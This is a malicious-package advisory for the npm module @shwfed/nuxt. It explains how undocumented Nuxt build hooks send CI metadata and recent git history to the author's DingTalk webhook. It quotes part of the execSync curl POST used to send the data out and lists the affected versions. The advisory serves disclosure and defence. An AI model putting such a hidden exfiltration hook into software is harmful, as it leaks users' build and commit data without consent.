VYPR

npm · Malicious package advisory

Malware

@shwfed/nuxt

MAL-2026-4444

Malicious code in @shwfed/nuxt (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (87ac343d6f89a601749bb115fa6902e7d39c71a0a6469690ecef56e9ea8a135e)
@shwfed/nuxt is published as a Nuxt UI module but contains undocumented build-hook code that, when a consumer integrates the module and runs a build under CI, POSTs the consumer's CI/build metadata and recent git history to a hardcoded third-party DingTalk webhook owned by the package author. In dist/module.mjs, the `build:error` and `build:done` Nuxt hooks invoke `execSync("curl -s -X POST '${url}'... -d @-", { input: payload })` against `https://oapi.dingtalk.com/robot/send` with an embedded `access_token` (`a01e0fdf...`) and an embedded HMAC signing secret (`SEC9d852...`). The payload includes JOB_NAME, BUILD_NUMBER, branch name, RUN_DISPLAY_URL, build error message, the last 5 git log entries (commit subjects and author names) from the consumer's repository, and the last commit author. The destination is fixed in the source — not configurable, not documented, and unrelated to the module's advertised UI-component purpose. Any consumer that adds this module to their Nuxt config and runs CI builds leaks build status and recent git commit metadata (including third-party committer names) to the author's DingTalk channel without consent.

Compromised versions (3)

  • 0.13.0
  • 0.12.0
  • 0.13.1

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.